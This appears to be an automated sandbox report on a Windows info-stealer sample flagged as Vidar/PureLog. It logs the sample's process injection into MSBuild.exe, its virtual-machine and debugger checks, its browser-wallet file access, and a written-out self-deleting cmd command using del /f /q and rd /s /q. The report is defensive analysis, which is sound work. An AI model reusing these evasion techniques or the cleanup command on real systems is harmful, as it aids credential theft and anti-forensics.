                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Country aware sample found (crashes after keyboard check)
                    Source: c:\users\user\desktop\securiteinfo.com.win32.malware-gen.198.6512.exeEvent Logs and Signature results: Application crash and keyboard check
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                    Source: MSBuild.exeBinary or memory string: SBIEDLL.DLL
                    Source: MSBuild.exeBinary or memory string: API_LOG.DLL
                    Source: MSBuild.exe, 00000001.00000002.2042878342.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\nss3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\softokn3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\AFCBAEBAEBFH\freebl3.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 9.3 %
                    Source: C:\Windows\SysWOW64\timeout.exe TID: 7032Thread sleep count: 89 > 30Jump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h1_2_0040FCE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00401162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004162AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,FindNextFileA,FindClose,1_2_004153F6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040B463
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_004094E5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040C679
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00415AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_00409F72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00409900
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040A981
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,1_2_00415E66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,1_2_00415843
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FE81 GetSystemInfo,wsprintfA,1_2_0040FE81
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: MSBuild.exe, 00000001.00000002.2047307875.0000000007D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarem F5
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: MSBuild.exe, 00000001.00000002.2047307875.0000000007D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeAPI call chain: ExitProcess graph end nodegraph_0-58062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_1-53585
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D06948B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D01B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6D01B6C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00401000 GetProcessHeap,HeapAlloc,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,1_2_00401000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D06948B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D06B144
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041937F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041E438 SetUnhandledExceptionFilter,1_2_0041E438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A8A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CD0AC62
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe PID: 6580, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6712, type: MEMORYSTR
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                    Searches for specific processes (likely to inject)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_004111BE
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42E000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 641000Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: A1E008Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe" & rd /s /q "C:\ProgramData\AFCBAEBAEBFH" & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CD54760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CD54760
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D0684B0 cpuid 0_2_6D0684B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_0040FCE5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeCode function: 0_2_6D06A25A GetSystemTimeAsFileTime,__aulldiv,0_2_6D06A25A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,1_2_0040FBCB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_0040FC92
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.198.6512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.5a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1624122549.00000000005A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f3d5c0.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.Malware-gen.198.6512.exe.3f6f5f0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
